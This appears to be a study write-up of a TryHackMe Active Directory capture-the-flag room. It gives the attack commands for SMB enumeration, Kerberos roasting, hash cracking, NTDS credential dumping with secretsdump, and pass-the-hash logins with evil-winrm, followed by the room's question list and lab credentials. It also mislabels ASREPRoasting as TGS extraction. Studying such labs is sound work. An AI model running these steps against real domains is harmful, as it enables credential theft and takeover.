We covered a scenario of Windows active directory penetration testing where we demonstrated basic enumeration using Nmap then performed ASREPRoasting against the Kerberos protocol to list the active users and their tokens. Then we escalated the privileges using the NTDS database.
Windows Active Directory Penetration Testing Study Notes
Overview
SMBClient: To access and enumerate shared files.
Objective: Complete tasks in the Active Directory room and capture flags by leveraging enumeration, credential harvesting, and privilege escalation techniques.
Tools Used:
Nmap: For network scanning.
Enum4Linux: To enumerate NetBIOS and SMB shares.
Impacket: Tools like GetUserSPNs.py and SecretsDump.py.
Key Steps
1. Enumeration
- Nmap Scan:
- Command:
nmap -sV -A <IP>
- Identified open ports and services:
- HTTP, SMB (139/445), Kerberos, LDAP, and RDP.
- Confirmed the machine is part of an Active Directory environment.
Enumerate SMB Shares:
- Tool:
Enum4Linux. - Command:bashCopy code
enum4linux -a <IP>
-
- Extracted:
- Domain name:
thmad.local. - List of SMB shares.
- Notable user accounts like
SVC_AdminandBackup.
- Domain name:
- Extracted:
2. Kerberos Exploitation
- User Enumeration:
- Tool:
GetUserSPNs.py(from Impacket). - Command:
- Tool:
python3 GetUserSPNs.py <DOMAIN>/<USER> -dc-ip <IP> -request
- Output:
- Identified user accounts with Kerberos pre-authentication disabled (
SVC_Admin). - Extracted a TGS ticket for the
SVC_Adminaccount.
- Identified user accounts with Kerberos pre-authentication disabled (
Password Cracking:
- Tool:
Hashcat. - Command:
hashcat -m 18200 <TGS_Hash_File> <Wordlist>
Discovered SVC_Admin password: Management2005.
3. Accessing SMB Shares
- Listing Shares:
- Tool:
SMBClient. - Command:
- Tool:
smbclient -L //<IP> -U "SVC_Admin"
- Found:
- A share named
Backup.
- A share named
Accessing the Backup Share:
- Command:
smbclient //<IP>/Backup -U "SVC_Admin"
- Found a Base64-encoded credentials file.
Decoding Credentials:
- Command:
echo "<Base64_String>" | base64 -d
Extracted another set of credentials: Backup:BackupPass123.
4. Privilege Escalation
- Dumping NTDS Hashes:
- Tool:
SecretsDump.py(from Impacket). - Command
- Tool:
python3 secretsdump.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
- Output:
- Dumped NTLM hashes for all Active Directory accounts.
Authenticating with Administrator Hash:
- Technique: Pass-the-Hash.
- Tool:
Evil-WinRM. - Command:
evil-winrm -i <IP> -u Administrator -H <NTLM_Hash>
Obtained root access to the system.
Summary
- The room demonstrates common Active Directory attacks:
- Enumerating users and shares.
- Exploiting Kerberos vulnerabilities.
- Dumping NTDS hashes.
- Privilege escalation to capture flags.
- Tools like Impacket, Hashcat, and Evil-WinRM are instrumental in the exploitation process.
TryHackMe Attacktive Directory | Room Answers
What tool will allow us to enumerate port 139/445?
What is the NetBIOS-Domain Name of the machine?
What command within Kerbrute will allow us to enumerate valid usernames?
What notable account is discovered? (These should jump out at you)
What is the other notable account is discovered? (These should jump out at you)
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
What mode is the hash?
Now crack the hash with the modified password list provided, what is the user accounts password?
What utility can we use to map remote SMB shares?
Which option will list shares?
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
What is the content of the file?
Decoding the contents of the file, what is the full contents?
What method allowed us to dump NTDS.DIT?
What is the Administrators NTLM hash?
What method of attack could allow us to authenticate as the user without the password?
Using a tool called Evil-WinRM what option will allow us to use a hash?
backup
Administrator
